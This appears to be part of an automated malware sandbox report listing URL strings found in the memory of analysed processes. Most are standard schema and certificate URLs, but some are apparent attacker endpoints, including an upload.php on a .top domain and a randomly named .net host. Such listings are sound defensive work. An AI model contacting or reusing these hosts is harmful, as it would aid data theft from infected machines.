Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: Set-up.exe, 00000022.00000003.2180595839.000000000014B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000002.2257502711.0000000000156000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000002.2257502711.000000000013E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexx5vs.top/
Source: Set-up.exe, 00000022.00000002.2257502711.000000000013E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexx5vs.top/b
Source: Set-up.exe, 00000022.00000003.2140206433.000000000013E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexx5vs.top/j
Source: Set-up.exe, 00000022.00000002.2257502711.0000000000156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexx5vs.top/k
Source: Set-up.exe, 00000022.00000003.2180595839.000000000014B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000002.2257502711.0000000000156000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2139418690.0000000000149000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000002.2257502711.000000000010E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000002.2257502711.000000000013E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexx5vs.top/v1/upload.php
Source: Set-up.exe, 00000022.00000002.2257502711.000000000013E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexx5vs.top/v1/upload.phpZ
Source: Set-up.exe, 00000022.00000003.2180595839.000000000014B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivexx5vs.top:80/v1/upload.php47u
Source: runtime.exe, 00000023.00000000.2063261246.0000000000409000.00000002.00000001.01000000.00000018.sdmp, runtime.exe, 00000023.00000002.2070000967.0000000000409000.00000002.00000001.01000000.00000018.sdmp, runtime.exe.17.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.2007562137.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2539794352.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.1998005775.0000000007306000.00000004.00000001.00020000.00000000.sdmp, nss3[1].dll.31.dr, crypteda.exe.17.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, GOLD[1].exe.17.dr, mozglue.dll.31.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.31.dr, crypteda.exe.17.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, GOLD[1].exe.17.dr, mozglue.dll.31.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: nss3[1].dll.31.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: nss3[1].dll.31.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: nss3[1].dll.31.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, crypteda.exe.17.dr, GOLD[1].exe.17.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, crypteda.exe.17.dr, GOLD[1].exe.17.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, runtime.exe.17.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, runtime.exe.17.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, runtime.exe.17.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, runtime.exe.17.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: runtime.exe, 00000023.00000002.2070175435.0000000000434000.00000004.00000001.01000000.00000018.sdmp, runtime.exe, 00000023.00000002.2070175435.0000000000420000.00000004.00000001.01000000.00000018.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: runtime.exe, 00000023.00000002.2070175435.0000000000434000.00000004.00000001.01000000.00000018.sdmp, runtime.exe, 00000023.00000002.2070175435.0000000000420000.00000004.00000001.01000000.00000018.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: runtime.exe, 00000023.00000002.2070175435.0000000000434000.00000004.00000001.01000000.00000018.sdmp, runtime.exe, 00000023.00000002.2070175435.0000000000420000.00000004.00000001.01000000.00000018.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, runtime.exe.17.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: explorer.exe, 00000020.00000003.2271119627.000000000C59A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000072C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2553614594.000000000C590000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://pxqpkqxbcagfr.net/
Source: explorer.exe, 00000020.00000003.2271119627.000000000C59A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2553614594.000000000C590000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://pxqpkqxbcagfr.net/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 00000020.00000000.2005256952.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000002.2538694653.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.2004496675.0000000007C70000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
